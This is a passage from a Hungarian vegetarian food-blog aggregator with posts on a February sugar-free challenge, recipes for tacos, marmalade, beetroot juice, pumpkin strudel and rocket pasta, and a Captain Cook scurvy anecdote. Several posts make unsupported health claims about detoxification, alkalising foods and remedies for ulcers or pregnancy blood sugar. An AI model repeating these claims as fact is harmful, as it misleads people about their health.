Viszonylag könnyen telt az első hét nálunk. Az elején voltak nehézségek, amikor igazán megkívántuk azt a 70%-os kocka csokit vacsora után (valószínűleg nem mi követeltük, csak a szervezetünkben élősködő kedves gombácskák). :) De utána egyre könnyebb lett. Aszalt gyümölcsök közül egyelőre mazsolát és szilvát ettünk, a friss gyümölcsök közül banánt, almát, citromot, narancsot és grapefruitot. Édes íz utáni vágyunkat frissen préselt céklalével is csillapítottuk. Sokszor van olyan érzésünk, hogy valamivel pótolnunk kell az édeset, a csokit, ilyenkor muszáj valamit nassolni... a legtöbbször mandulát pirítok vagy nyersen eszünk törökmogyorót, kesudiót, paradiót. Kollégáknak sütöttem a héten túrós pogácsát, ami nem élesztős, csak egy kis szódabikarbóna kell bele, viszont van benne tejtermék (a tojást elhagytam). Így kevésbé kerültük a tejterméket, viszont volt sós nasi! Egyetlen egyszer követtem el bakit, amikor egyik nap ebédelni mentem, a főételemhez kértem egy kis adag csalamádét. Belekóstoltam és rájöttem, hogy van benne cukor. De úgy gondolom, hogy a tudattalanul elkövetett bűnök nem számítanak, mert nem előre megfontolt szándékkal választottam cukros csalamádét.
Kíváncsi vagyok, nálatok, hogy telt az első hét. Aki beszáll a nyereményjátékba is, azoktól feltétlen várom a néhány soros beszámolót komment formájában itt a bejegyzés végén vagy ha a blogján ír valaki beszámolót, akkor küldje el nekem emailben a beszámoló linkjét februári kihívás címmel. A közzétett bejegyzéseket folyamatosan frissíteni fogom és megjelentetem mind az aktuális heti beszámolókban. Aki használ Instagramot, az a kihívás idején februárban címkézze fel az általa elfogyasztott ételek képeit az alábbiak szerint: #februaricukormenteskihivas. Lesz egy jó kis online albumunk!
Akik eddig írtak a cukormentes kihívásról:
- Mariann - Jenis konyhai kísérletei (meglepő, hogy a férje győzte meg a cukormentes kihívásról)
- Viki - Étel Ital Kicsi Vú (maximum íz, no cukor felhívással csatlakozott)
- Noémi - Mandulasarok (fantasztikus gesztenyelisztes édesburgonya gnocchi receptet is megosztott)
- Boglárka - Önismereti kalandtúra (januártól saját maga által összeállított étrendet fogyaszt, naponta összefoglalja, hogy mit eszik és beszállt a februári cukormentes kihívásba)
- Orsi - Wannabe Chef (egy fincsi quinoa saláta receptet is megosztott)
Quesadilla
Most pedig irány Mexikó...
A bejegyzés megírásához igyekeztem felidézni 2005-ös mexikói kalandozásaimat, amikor meglátogattam egy Pueblaban élő mexikói barátnőmet, Mariat. Ettünk étteremben is, de az anyukája rengeteg finomságot készített nekünk. Igazi jó mexikói házias koszton éltem néhány hétig. Legélénkebb emlékeimben a guacamole (avokádó krém), a paradicsomos salsa, a tortilla és a mindenhez felszolgált lime él.
A taco kukorica- vagy búzalisztből készült félbe hajtott tortilla, amelyet mindenféle finomsággal (zöldségekkel, hússal, hallal) lehet megpakolni. Köretként tálalnak mellé friss koriandert, guacamolét, salsat, salátát. A quesadilla szintén kukorica- vagy búzalisztből készült tortillaból áll, két tortilla lap összeragasztva sajttal, vékonyan megtöltve zöldségekkel vagy hússal, háromszög cikkelyekre vágva és így tálalva. Ez is fogyasztható guacamoléval, salátával, salsaval, tejföllel. Ha az alapanyagokat előző nap beszerezzük, akkor mindkét fogás kiváló gyors hétköznapi vacsorának és még az ízlelőbimbóinkat is életre keltettük!
Sütőtökös feketebabos taco és quesadilla
Hozzávalók 3-4 főre:
Tacohoz :
- 250-300 g sütőtök, meghámozva, felkockázva
- 240 g feketebab (1 konzerv), leszűrve, átmosva
- 1 fej vöröshagyma, felaprítva
- 2 teáskanál füstölt pirospaprika
- só, bors
- tortilla lapok
- főtt rizs
- guacamole
- 150 ml tejföl + 2 teáskanál csípős chiliszósz, összekeverve
- koriander
- lime
- olívaolaj
Quesadillahoz (ugyanazok, mint a tacohoz):
- 150 g reszelt sajt
Guacamolehoz :
- 2 db érett avokádó, héj és a mag eltávolítva
- 1 kis fej vöröshagyma, felaprítva
- 1 gerezd fokhagyma, felaprítva
- 1/2 lime kifacsart leve
- só, bors
- koriander, felaprítva
Töltelék elkészítése: két evőkanál olívaolajon pirítsuk meg a felaprított vöröshagymát, adjuk hozzá a kockára vágott sütőtököt. Pároljuk 8-10 percig, majd adjuk hozzá a feketebabot. Ízesítsük sóval, borssal, szórjuk meg a füstölt pirospaprikával, keverjünk rajta egyet és tegyük félre.
A tacohoz teflon serpenyőben pirítsuk meg a tortilla lap mindkét oldalát (kicsit hólyagos lesz), tegyük tányérra és kanalazzunk bele főtt rizst, sütőtökös babos keveréket, guacamolét, chilis tejfölt, szórjuk meg korianderrel, facsarjunk rá egy kevés lime levet és már ehetjük is.
A quesadillahoz teflon serpenyőben kezdjük el melegíteni alacsony lángon a tortilla lap egyik oldalát. Szórjuk meg reszelt sajttal, majd várjuk meg, amíg a sajt elkezd olvadni. Ekkor vékonyan rétegezzünk rá a főtt rizsből, a sütőtökös feketebabos keverékből, majd szórjuk meg újra reszelt sajttal és tegyünk a tetejére még egy tortilla lapot. Az egészre nehezékként tegyünk néhány tányért (hogy minél vékonyabb legyen) és így pirítsuk néhány percig. Vegyük le a tányérokat és egy spatulával fordítsuk meg az egész quesadillát, hogy a felső tortilla lap is megpiruljon (közben megint tegyük a tetejére a tányérokat nehezéknek). Ha a másik oldala is megpirult, tegyük tányérra, vágjunk háromszög cikkelyeket belőle és tálaljuk guacamoléval és chilis tejföllel.
A guacamoléhoz az avokádókat törjük össze villával. Adjuk hozzá a felaprított vöröshagymát, fokhagymát, a lime levét és ízesítsük sóval, borssal és felaprított korianderrel. Pirítós kenyérre kenve is kiváló feltét!
Viva Mexico!
Veracruz kikötő, parti sétány
A legcukibb spanyol szó: burro, csacsit jelent :)
Teotihuacan, ahol a Nap (La Pirámide del Sol) és a Hold (La Pirámide de la Luna) piramisok láthatók
Puebla, főtér
Zöldséges édesburgonyalepény
2013. február 6. Punk In The Kitchen
Még él a blog! A mai recept alapanyaga az édesburgonya, avagy batáta. A neten elolvashatjuk, hogy milyen egészséges, satöbbi. Az elkészítés pofonegyszerű, a receptet innenloptam. Zöldséges édesburgonyalepény Hozzávalók: 1 nagy édesburgonya tetszőleges maradék zöldségek 1 hagyma só, vegeta vagy egyéb fűszerek olaj liszt, burgonyaliszt Idő: mondjuk egy óra, hallgassuk meg párszor az új PFAremekművet! Az édesburgonyát megpucoltam, felkarikáztam és vegetás vízbe dobtam. Melléhajítottam a maradék zöldségeket, amik voltak itthon (karalábé, fehérrépa, kevés káposzta), majd jól megfőztem az egészet. Egy hagymát megpucoltam, felkockáztam, olajon megpirítottam, majd erre ment a feldarabolt megfőtt zöldség és a batáta, amit nem kell darabolni mert szépen szétf?. Az egészet összekavartam, raktam hozzá kevés szójaszószt, vegetát, sót. Hogy formázható legyen a cucc, raktam bele lisztet meg burgonyalisztet. Eleinte elég puha volt, de végül sikerült egy egész jó állagú valamit elérni. Olajos serpeny?be kanálnyi adagokat pakoltam, igyekeztem kilapítani és így mindkét oldalt megsütni. Kicsit szétesnek a darabok, meg odaég, de az eredmény egész jóízű. Egy próbát megér, hajrá!
Sajtótájékoztató, képes beszámoló
2013. február 6. Gitta nyersétel blogja
Múlt csütörtökön, január 31-én sajtótájékoztatót tartottunk a Nyersétel Akadémián. Nagy volt előtte a készülődés, mindent megterveztünk, nem bíztunk semmit a véletlenre :) Egy nagyszerű beszámolót olvashattok az eseményről Tünde blogján itt: Bezzeganya Minél több természetes ételt eszel, annál egészségesebb leszel! A Nyersétel Akadémiát azért hoztuk létre, hogy az emberekkel megismertessük az élő ételek csodálatos hatását, és a nyerskonyha legérdekesebb ,,titkait. A mai rohanó világunkban egy dolgozó embernek azonban nagyon nehéz megoldani az alapanyagok beszerzését, és az időigényes élő ételek elkészítését. Ugyanakkor szeretnénk, ha élő ételeink mindenki számára elérhetők lennének. Éppen ezért a Vegafood étlapján egy teljes menüt kínálunk a nyers étkezés különlegességeiből, főételekből, az aszalással előállított ételekből és a legkedveltebb nyers édességekből. A Nyersétel Akadémia programjaiba be tudsz kapcsolódni TE is, nézz szét itt: Nyersétel Akadémia Ha pedig meg szeretnéd rendelni ételeinket, akkor kattints ide: VEGAFOOD Minden vendég választhatott: trópusi gyümölcskoktél, vagy zöld turmix volt a wellcome-drink! Egy kellemes beszélgetés H.Varga Mariannal, aki nagyon jókat kérdezett! Élőben készült a citromos datolya leves: Ez a látvány fogadta a vendégeket a beszélgetés után a másik szobában: Cukkíni spagetti: Citruspuding Zöldségcurry (az egyik kedvenc) Ez volt a díszlet: Datolyás csokigolyók: Beszélgetés az asztalnál, ízlett mindenkinek! Természetesen, egészségesen! A zöld nem hiányozhatott: Egy művészi fotó a cukkíni spagettiről: Székelykáposzta nyersen: Kóstoló falatkák, színesek, finomak! Alapanyagaink, fűszereink, kész termékeink: És végül a csapat: Szőke Gábor, Szőke Ágnes, dr. Kuklis Eszter, Lénárt Gitta, H.Varga Mariann, Javed Hayini Ketten Gáborral: (miért nem szólt senki, hogy égnek áll a hajam?) Jobbra Ricsi (rich man), aki ellátja szervezetét vitamindús tápanyagokkal, enzimekkel, balra pedig Puri (poor man), aki csak sült-főtt és feldolgozott ételt eszik, amiben kevés az értékes tápanyag, ezért ő szegény :( Itt több látszik a feliratból, éppen ezt mutatjuk...
Narancs-turmix...Avagy Cook kapitány kincse almával párosítva.
1769-ben maori halászok tették a napi rutin feladataikat kenuikban a mai Új-Zéland környéki szigetvilágban, amikor a látóhatáron szokatlan jelenségre lettek figyelmesek. Egy 31 m hosszú, három árbócos vitorlás hajó tűnt fel, a brit Királyi Haditengerészet zászlójával. Az ágyúkkal felszerelt egykori kereskedelmi hajó orrán, ami végigpásztázta a partvidéket, a HM Bark Endeavour volt olvasható. A hajó James Cook kapitányé volt 94 utassal és legénységgel. Abban az időben szokatlan módon a hajón két ember kivételével, mindenki egészséges volt. Az élet a hajó fedélzetén nem ördögtől való volt, ahogy ez akkoriban a népszerűséghajhászó írásokban megjelent. Titka egyszerű volt. Cook kapitány következetesen mindenkivel betartatta a szigorú higiéniai előírásokat és étkezési szokásokat. Citrusféléket, így narancsot fogyasztottak, valamint káposztát, savanyú káposztát, ezzel sikerült a skorbutot is kiiktatniuk, ami akkoriban az egyik legveszedelmesebb ellenség volt a hajók fedélzetén. Nem kívánom részletezni, milyen szörnyűséges külső tünetek kezdetével jutott el a skorbutban szenvedő beteg néhány nap alatt a halálig. Csak később, Szent-Györgyi Albert tanulmányozásai során került kimondásra, hogy a citrusfélék, így a narancs is C-vitamint tartalmaz, s ez által menekültek meg Cook kapitány hajóján az emberek a betegségtől. (Kép innen, thank you!)
Itt a tél, és annak minden velejárója. Hétről hétre melegszik az idő, ami azzal is jár, hogy a légúti megbetegedések, vírusok egyre inkább szaporodnak. Amennyire fontos nyáron az, hogy a meleg miatt sok folyadékot igyunk, annyira fontos ilyenkor is, hogy megfelelő hőmérsékletű vizet igyunk minden nap. Megfelelő hőmérsékleten azt értem, ha lehet, kerüljük a hideg vizet. Ha van rá mód, melegebb italokat fogyasszunk. Jól tesszük, ha minden nap egy csésze fekete kávé helyett valamilyen finomabb gyógynövényből készített teával indítjuk a napunkat. (Pl. citromfű, menta, szárított bodzavirág) Szintén a megelőzésben fontos szerepe van, ahogy a fenti történetből is kiderül, a sok C-vitamin tartalmú gyümölcs fogyasztása. Talán nem tudunk egyszerre két-három narancsot elfogyasztani, de ha turmixot készítünk belőle, máris könnyebben szervezetünkbe juttatjuk. Ha tehetjük, 2-3 naponként készítsünk valamilyen turmixot, vagy ha máskor nem, legalább a hétvégéket tegyük színesebbé általuk. Ismét ajánlom azoknak is, akik nehezen bírják rá családtagjukat a gyümölcsök fogyasztására. Ha éhgyomorra fogyasztjuk, ráadásul jól átmossa az előző napok salakanyagától az emésztőrendszerünket.
A recept:
Hozzávalók:
- 2 narancs (mandarin is lehet)
- 2 alma
- 1 dl víz
- turmixgép (min. 500 watt)
Elkészítés:
Az almát alaposan megmossuk, majd a turmixgépbe daraboljuk. A narancsot megpucoljuk, gerezdekre szedjük és a turmixgépbe tesszük. Kevés vizet öntünk a turmixgépbe és már mehet is a turmixolás egészen addig, míg jó sűrű pépet nem kapunk.
Poharakba vagy bögrékbe töltjük és elfogyasztjuk! Tetejére "tálaláskor" szórhatunk kókuszreszeléket, amit előtte akár kicsit meg is piríthatunk teflonsütőben. (Legutóbb én ezt a műveletet kihagytam.)
Februári cukor- és édességmentes kihívás
2013. február 1. Zizi kalandjai
Januárban már írtam a februári cukor- és édességmentes kihívásról. Jeleztem, hogy ha valaki szeretne részt venni a kihívásban, akkor kommentben jelezze. Megjegyeztem, hogy a kihívást végigcsinálók közül ki fogok választani valakit, aki valamilyen nyereményben részesül.
A téli időszakban, az évvégi ünnepek alatt nálunk megnövekszik az édesség fogyasztás. Egy kis süti itt, meg ott, egy kocka csoki vacsora után és észre sem vesszük, de egyre több édes dolgot eszünk, hogy a napsütés utáni vágyunkat valamivel kárpótoljuk. Tudom, hogy a fogadalmak, kihívások kezdete általában január szokott lenni, de mivel a hónap elején még sok a maradék sütemény az ünnepekről, így a kihívást mindig februárra időzítem tavaly óta.
Az előző évben nagyon szigorú voltam magunkkal szemben és a cukron, süteményeken, csokin kívül vegán étrendre fogtam magunkat és a nagyon édes gyümölcsöket sem engedélyeztem. Az idén nem leszek ilyen szőrös szívű... Lássuk milyen kihívások elé állítom magunkat és azokat, akik velünk tartanak.
Nem eszünk/iszunk:
- cukrot (kristály, por, nád, kókuszvirág, pálma, stb.)
- mézet
- agavé-, juhar-, rizs- és malátaszirupot
- olyan élelmiszert, amiben a fentiek előfordulnak (pékáru, ropi, kekszek, sütemények, szószok, stb.; húsevők figyeljenek, mert felvágottakban is lehet cukor)
- kávé, fekete tea, kakaó, alkoholos italok
Eszünk/iszunk:
- friss gyümölcsöket (alma, citrom, grapefruit, narancs, mandarin, kivi, banán)
- ha nagyon nem bírjuk már, akkor bekapunk egy-egy falat aszalt gyümölcsöt, olyat, ami nincsen édesítve (datolya, sárgabarack, szilva, stb.)
- fogyasztható cukormentes lekvár és olyan sütemény, amely banánnal, naranccsal, céklával, répával vagy almával lett édesítve
- víz, gyógytea, frissen facsart/centrifugázott gyümölcs- és zöldséglevek
Igyekszünk kerülni:
- tejtermékeket
- tojást
- fehér lisztből készült élesztős pékárukat
Minél többet eszünk:
- nyers zöldségekből, gyümölcsökből
- olajos magvakból: nyersen vagy pirítva sózás nélkül: mandula, dió, mogyoró, tökmag, napraforgómag, kesudió, paradió, stb.
- gabonafélék: köles, hajdina, bulgur, barnarizs, quinoa, árpagyöngy
- hüvelyesek: bab, lencse
- tofu
Heti bontásban őszintén be fogok számolni nektek a kihívásról, a csoki utáni sóvárgásról (biztos lesz ilyen :)), az ételekről, amiket fogyasztunk és az új ízekről, amiket felfedezünk. A nyereményért folyó küzdelem feltétele, hogy amikor közzé teszem a heti beszámolókat, azok, akik részt vesznek a kihívásban őszintén írják meg a bejegyzések után kommentben a saját tapasztalataikat. Azok közül fogok választani (és nem sorsolni, tehát én döntök!), akik végigcsinálják mind a négy hetet és legalább négy kommentet írnak!
Fontosnak tartom megjegyezni, hogy a témában leírtakat a saját tapasztalataimra alapozom. Ha úgy gondoljátok, hogy ti is szeretnétek kipróbálni, kérjétek ki egy szakember véleményét, tájékozódjatok a témában és saját felelősségetekre cselekedjetek.
Sok sikert mindenkinek! Hajrá!
Narancslekvár és uramatyám a Bocuse dOr versenyen
2013. január 30. Zizi kalandjai
(function(d, s, id) {
var js, fjs = d.getElementsByTagName(s)[0];
if (d.getElementById(id)) return;
js = d.createElement(s); js.id = id;
js.src = //connect.facebook.net/en_US/all.js#xfbml=1&appId=467459323271844;
fjs.parentNode.insertBefore(js, fjs);
}(document, script, facebook-jssdk));
Amikor a Dolce Vita Konyha webáruháztól megrendeltem a 12 kg szicíliai kezeletlen héjú vérnarancsot, reméltem, hogy finomak, lédúsak és fotogének lesznek! :) Mindez teljesült! A belsejük nem vérvörös, inkább pirosba hajló narancsos, ízre enyhén savanykásak, de csak annyira, hogy nem húzza össze a szánkat. Nem vagyok egy nagy befőzős típus, na nem azért, mert nem akarnám vagy szeretném, hanem azért, mert egy mini konyhánk van kamra nélkül és a sok-sok finomságot nem tudnám hova tenni. Azért néha teszek kivételt - például amikor marokkói sóban eltett citromot készítettem vagy életem első lekvárját eperből... ezekkel a csodaszép narancsokkal sem történt ez másképp.
Életem első narancslekvárját Angliában kóstoltam. Náluk nagyon népszerű az orange marmalade, itthon viszont kevés helyen kapható. Kutattam a neten receptek után, olyat akartam főzni, amibe nem kerül több kiló cukor és egyéb felesleges hozzávaló sem. Szerencse, hogy Éva kirakott nemrég a blogjára egy receptet. Vele való konzultáció után úgy döntöttem, hogy belevágok. Este kezdtem hozzá, éjjel 1-kor töltöttem az üvegekbe a lekvárt, de megérte.
---
A blogbejegyzés írása közben lezajlott a 2013-as Bocuse dOr verseny és eredményhirdetése is. Az elmúlt két napban igyekeztem online követni az eseményeket. A magyar csapat - Széll Tamás, Garai Ádám, Hamvas Zoltán, Bíró Lajos - a 10. helyezést szerezte meg a szakácsversenyek olimpiáján, Lyonban! Fantasztikus teljesítmény, pláne úgy, hogy Magyarország életében először jutott ki erre a rangos eseményre, amelyet 1987 óta rendeznek meg!!! Plusz a legjobb plakát díját is Magyarország nyerte az internetes szavazás eredményeként! Egyébként én a 6-10. helyezésben reménykedtem... persze csodás lett volna, ha nyerünk, de már így is benne vagyunk a világ legjobb 24-ében, ráadásul úgy, hogy ezzel a 10. hellyel felkerültünk a világ gasztronómiai térképére! :)
A végleges eredmény: 1. Franciaország, 2. Dánia, 3. Japán, 4. Nagy-Britannia, 5. Norvégia, 6. Svédország , 7. Egyesült Államok, 8. Izland, 9. Kanada, 10. MAGYARORSZÁG... Gratulálok a nyerteseknek és a magyar csapatnak a fantasztikus helytállásért!
Még több infó a versenyről és felkészülésről: itt, itt, itt, itt és itt.
És akkor jöjjön a narancslekvár...
Narancslekvár
Hozzávalók:
- 2 kg kezeletlen héjú narancs
- 400 g nádcukor
- 250 ml víz
- 1 rúd vanília, kis darabokra vágva (ahány üvegbe töltjük a lekvárt, annyi darabra vágtam fel)
A narancsokat mossuk meg alaposan, töröljük szárazra és késsel vagy hámozóval vékonyan hámozzuk le a héjukat úgy, hogy a fehér része ne kerüljön bele. Az így kapott narancshéj darabokat tegyük egy tálba, öntsük fel annyi vízzel, amennyi ellepi és hagyjuk állni két óráig.
Közben a narancsokat hámozzuk meg teljesen, tisztítsuk meg a fehér hártyától amennyire tudjuk és vágjunk vékony karikákat belőlük. Tegyük egy nagy lábasba a cukorral együtt és tegyük félre.
A beáztatott narancshéjakról öntsük le a vizet, vágjuk nagyon vékony csíkokra és adjuk hozzá a cukrozott narancshoz. Öntsük fel a vízzel (250 ml) és alacsony lángon kezdjük el főzni. Néha keverjük át. Nekem kb. két és fél óra után kezdett el besűrűsödni. Ha esetleg egy kicsivel kevesebb vizet (200 ml) adunk hozzá, akkor szerintem már hamarabb elkezd sűrűsödni. Amikor eléri a lekvár állagot, kezdjük el óvatosan belekanalazni a tiszta, fertőtlenített üvegekbe. Mindegyik tetejére tegyünk egy darabka vaníliarudat, zárjuk le, majd száraz dunsztban hagyjuk kihűlni. Nekem ebből a mennyiségből két 440 ml-es és két 230 ml-es üveg lett tele, plusz maradt egy kevés kóstolni való.
Tipp: ezzel a mennyiségű cukorral a lekvár édes, de enyhén savanykás lett. Legközelebb szerintem még kevesebb cukrot (kb. 300-350 g) teszek bele, hogy a savanykás íze még jobban megmaradjon. Mi pirított kalács szeletekre kenve ettük először. Mondanom sem kell, mennyei!
Téli vitaminpótlás frissen préselt levekkel (1. rész)
2013. január 22. Zizi kalandjai
Télen is van lehetőségünk nyersen fogyasztani zöldségeket és gyümölcsöket, azonban a választék lényegesen kisebb, mint a tavaszi-nyári időszakban. Mibe harapunk bele szívesen, ami ráadásul nyers is? Biztosan olyanba, ami lédús, édes vagy édeskés az íze. A gyümölcsök közül talán az alma, körte a legnépszerűbb a hazai, itthon termő választékból; déli társaikat tekintve pedig a narancs, a mandarin, a grapefruit, a banán és a citrom. Én legalábbis ezeket eszem/iszom a leggyakrabban. Ami a zöldségeket tekinti, kevés az olyan szezonális fajta, amelyet szívesen eszünk meg nyersen, igaz? Répa, karalábé, hagymafélék nálam lecsúsznak nyersen, de a céklának biztosan nem esik neki senki (vagy a sütőtöknek, de erről majd a következő bejegyzésben).
A gyönyörű rubinvörös gumós zöldség pedig édes, tápanyagokban gazdag; élelmi rostot, folsavat, káliumot, magnéziumot, A, B1, B2 és C vitamint tartalmaz. Vörös színe szinte egyértelműen adja kiváló vérképző hatását, így nyersen salátaként vagy léként fogyasztva segít a vörösvérsejtek regenerálásában és szaporodásában, bizonyos helyeken még kiegészítő gyógymódként is ajánlják vérszegénység esetén. A céklában található cukor könnyen hasznosítható, így gyors energiaforrást jelenthet a szervezetnek. Jelentős szerepe van a méregtelenítésben, és egyensúlyban tartja a szervezet sav-bázis egyensúlyát. Rendszeres fogyasztásával közérzetünk javulhat. A szervezet a zöldségek közül a céklából tudja kinyerni a legtöbb vasat. (Még többet a cékláról itt és itt.)
A cékla beltartalmi értékeit akkor őrizhetjük meg leginkább, ha nyersen fogyasztjuk, de ha túl erősnek találjuk a földes ízét, akkor a legjobb, ha héjastul sütjük meg. A vízben történő főzés során ugyanis a cékla folsavtartalmának (vízoldékony B vitamin) egy része átkerül a főzőlébe.
Nekem sem volt könnyű megszokni a földes ízt, ezért két dolgot alkalmazok. Ha köretként a főétel (mondjuk gombapöri nokedlivel :)) mellé valami szezonális nyerset szeretnék enni, akkor fogok egy nagy fej céklát, robotgéppel felaprítom (lehet reszelni is), facsarok rá jó sok citromlevet (1 citromét, de persze ez ízlésfüggő), meglocsolom jó fajta olívaolajjal, sózom, borsozom és hagyom állni legalább egy fél órát. Összeérnek az ízek, így egy enyhén savanykás nyers cékla salátát tudunk fogyasztani a főételünk mellé. Ezt tovább fokozhatjuk úgy, hogy a nyers céklás salátánkat joghurtba keverjük, esetleg hozzádobunk egy gerezd felaprított fokhagymát és már kész is a cékla tzatzikink, ami kiváló köret vagy ropogós kenyérre feltét és biztos vitaminforrás bomba.
A másik megoldás, hogy zöldség- és gyümölcscentrifugával kipréselem a levét, gyümölcsökkel összekeverem és máris enyhült a földes íz. Most egy ilyen frissen préselt lének jön a receptje.
Barátkozzatok a céklával, ő nagyon szeret bennünket. Csodaszép színe pedig nyugtató hatással van idegeinkre. Biztosan tudom... teszteltem! :)
Frissen préselt vörös démon juice
Hozzávalók 2 főre:
- 3 db kis cékla, meghámozva
- 2 db alma, kimagozva
- 1 db narancs, meghámozva
- kis darabka gyömbér (kb. 1,5 cm hosszú), meghámozva
- 1/2 citrom kifacsart leve
Gyümölcscentrifugán préseljük át a céklákat, almákat, narancsot és gyömbért. Adjuk a kipréselt léhez a citromlevet, keverjük el és öntsük poharakba. Azonnal fogyasszuk.
Tipp: ha először készítjük és iszunk ilyet, hígíthatjuk a kész levet egy kevés vízzel, hogy ne extra dózisban kapjuk a zöldségtől, gyümölcsöktől édes, a gyömbértől viszont enyhén csípős levet.
Sütőtökös rétestorta
Semmi flinc-flanc nincs az elkészítésében, viszont egy finom étel kerülhet az asztalra vele. Már írtam a sütőtök jótékony hatásairól itt. Úgy gondolom, nem csak sült és krémleves formában érdemes fogyasztani. Sokan nem tudnak elrugaszkodni ettől a két fajta elkészítési lehetőségtől, nekik is ajánlom következő bejegyzésem. Igazából olcsó kis finomság, hiszen egy csomag réteslap sem kerül sokba, ráadásul egy sütőtök (kanadai) ára is elfogadható. Az igazság az, hogy elég gyorsan elfogyott ez a tortácska. Szóval legközelebb is készítek. Akkor már lehet, rétegezem és egyfajta "emeletes" sütőtökös rétestorta lesz.
A recept:
Hozzávalók:
- 1 kockákra vagy szeletekre vágott, megpárolt vagy megsütött sütőtök
- 1 csomag réteslap
- szerecsendió
- ételízesítő (jó, ha házi)
- kevés kókuszzsír
- búzadara
Elkészítés:
A felkockázott vagy vékony szeletekre vágott sütőtököt keményre pároljuk, vagy akár kókuszzsírral kikent tepsiben meg is süthetjük (héj nélkül). Mindkét esetben egy kevés ételízesítővel megszórjuk. Amikor már valamennyire megpuhult (nem nyers), de mégis kemény az állaga, egy kevés szerecsendióval összekeverjük.
Egy tortaformát kikenünk alaposan kókuszzsírral, majd a 2 réteslappal kibéleljük. Kókuszzsírt teszünk a réteslapokra és egy kevés búzadarával egyenletesen megszórjuk. A sütőtököket beletesszük, majd a réteslapok szélével befedjük. A maradék réteslapokat egy tálcán egymáson kiterítjük és a közepébe "kifordítjuk" az eddig összeállított sütőtökös tortát. A réteslapokkal szintén betakarjuk, így egyformán jut mindkét felére réteslap. Így helyezzük vissza a tortaformába a tálca segítségével. (Visszaborítjuk.) A tetejére is kókuszzsírt teszünk. A formát egy tepsibe helyezzük (a kókuszzsír megolvadva megfolyhat és kijutva a sütőtérbe égett szagot eredményezhet). Kb. 20 perc alatt aranybarnára sütjük.
A tortaformából már akkor vesszük ki, mikor kicsit megszikkadt, kihűlt a torta. Hidegen, melegen is fogyasztható. Előételnek, könnyed vacsorának vagy desszertnek is tálalható. Desszert esetében a szerecsendiót esetleg kihagyhatjuk, és egy kevés mézzel tovább édesíthetjük. (Bár én nem vagyok annak a híve, hogy zöldséget, gyümölcsöt tovább édesítsünk.)
UI: Ha nem melegen szeleteljük, nagyon szép szeleteket lehet vágni. Annyira kipróbáltuk volna, hogy nem vártuk meg az első szeletnél, hogy kihűljön, ezért csúszott szét picikét, de így is nagyon jó volt.
Ruccolás tészta
Mostanság gyakrabban kerül rukkola az asztalra.Régebben nem igazán szerettem, de a 2012-es év meghozta a változást. Nem tudom, hogy az Eleken eltöltött időnek köszönhetem-e, ott ugyanis nyersen, más zöld növényekkel együtt fogyasztottam. De az is lehet, hogy a valamivel nyersebb táplálkozásra való áttéréssel változik az ember teste és az, hogy mit kíván. Ahhoz képest, hogy a rukkola bizonyos vidékeken vadon megterem (Portugália, Spanyolország, Görögország, a Földközi tenger partjaihoz tartozó országok) elég sokára fedeztem fel ezt a zöld növényt. Kevesen tudják, hogy a káposztafélékhez tartozik és ráadásul virágzó növény, amely éjszaka árasztja illatát. Mivel a gyomorra jótékony hatással van, konkrétan gyomorsav kiválasztódás mennyiségét kordában tartja, gyomorfekély és savtúltermelődés esetén különösen ajánlatos fogyasztani. Mivel sötétzöld növény, így jótékony hatással bír a vér cukorszintjére, koleszterinjére, sőt hosszútávú fogyasztása még a kellemetlen testszag leküzdésében is szerepet játszhat. Ajánlják fogyasztani várandós anyukáknak is, egyrészt a már említett vércukorszintet stabilizálhatja, így segít megelőzni a kismamakori cukor megemelkedését, másrészt pedig az ilyenkor szokásos rosszullét tüneteire is mérséklően hat. Nem véletlen borsmustárként nevezik magyar nyelven, hiszen íze hasonlít a bors és a mustár ízeihez.
A recept:
Hozzávalók:
1 marék aszalt paradicsom apróbb darabokra vágva
1 nagyobb fej lilahagyma
2 szál újhagyma
2 db piros színű paprika (kápia, kaliforniai vagy pritamin)
egy marék ruccola (megmosva, lecsepegtetve
fél marék apróra vágott dió
2 dl növényi tej
leheletnyi szerecsendió
ételízesítő
50 dkg tészta (durum, vagy teljes kiőrlésű)
víz
só
Elkészítés:
A tésztát lobogó sós vízben al dentére főzzük. Közben a felaprított lila hagymát, újhagymát, paprikákat, aszalt paradicsomot és az aprított diót megpirítjuk, majd hozzáadjuk a növényi tejet. Amikor a hagymák és a paprika kicsit megpuhult, beleszórjuk a rukkolákat, amiket persze előtte megmostunk, lecsepegtettünk. Nem muszáj összevágni.Adunk az egészhez egy kevés ételízesítőt és szerecsendiót. Fedő alatt rottyan egy picit és kész is a szósz.Utólag még tehetünk hozzá fél maroknyi teljesen nyers ruccolát. Megdobja az ízét. Ha a növényi tejünk nem elég - mármint a 2 dl, akkor a megfőtt tészta vizéből vegyünk le egy keveset még hozzá.
A megfőtt tésztát leszűrjük összekeverjük a szósszal és kész is a finom "tésztasalátánk", amely önmagában is megállja helyét. Tésztasalátaként, vagy főételként is fogyasztható. Mi nagyon szerettük. Munkába is ezt vittük magunkkal.
Heti saláta ötlet: lucernacsírás almás répasaláta
2013. január 18. Napló étkeinkről, életünkről
Nagy adag lucernát csíráztattam még Karácsony előtt, így sokféle ételbe került belőle: salátába, rizsgombócba, szendvicsre, stb. Ez egy teljesen komplett étek volt, tettem még bele mazsolát, és darált mandulát. Ebben az édeskés salátában keveredik gyümölcs olajos maggal, ami nem jó párosítás lúgosítás szempontjából, de nagyon finom :-) Ezen a képen a saláta már utazott velem, így egy kicsit összerázkódott már, amit én jobban szeretek, mint amikor minden összetevő külön-külön nagyon ropogós.
Brokkolis polenta aszalt paradicsommal
2013. január 17. Fittanyuka Blog
A puliszkát szinte mindenki ismeri, kukorica darából készül és nagyon sokféleképpen felhasználható, édesen, sósan. Manapság hangzatosabb néven emlegetik az olasz konyhából, -nyelvből átvett polentaként. Élettanilag előnyös oldala, hogy gluténmentes, könnyen emészthető, de azért ne vigyük túlzásba a kukorica fogyasztását. Kifejezetten téli étel, a hegyvidéki emberek kedvenc tápláléka, Olaszországban északon a legelterjedtebb, Erdélyben úgyszintén, itt édes változata a málé, amelyet régóta tervezek elkészíteni, természetesen majd megosztom veletek a megreformált receptet. Hozzávalók: (3-4 fő részére) 130 g kukorica dara 1 kk himalaya só 3szoros mennyiségű víz 2 evőkanál kókusz olaj 1 kis fej brokkoli 1 cikk fokhagyma pár szem aszalt paradicsom késhegynyi őrölt szerecsendió növényi sajt a tetejére A sós vizet forralni kezdjük és amikor már éppen forr, beleszórjuk a darát és állandó keverés mellett addig főzzük ameddig besűrűsödik. Közben a brokkolit rózsáira szedjük, roppanósra pároljuk. Tipp: Ha a pároló vízbe késhegynyi szódabikarbónát 